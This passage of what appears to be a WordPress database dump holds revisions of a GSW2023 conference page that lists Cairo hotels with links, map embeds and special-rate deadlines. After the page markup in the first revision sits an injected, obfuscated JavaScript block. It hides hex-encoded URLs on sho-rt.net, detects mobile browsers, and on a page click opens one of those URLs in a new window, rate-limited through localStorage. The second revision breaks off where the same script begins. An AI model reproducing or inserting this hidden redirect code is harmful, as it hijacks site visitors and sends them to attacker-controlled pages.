NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:21:11','2023-07-18 23:21:11','',2685,'https://gsw2023.com/?p=5030',0,'revision','',0),
(5031,1,'2023-07-18 23:21:20','2023-07-18 23:21:20','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 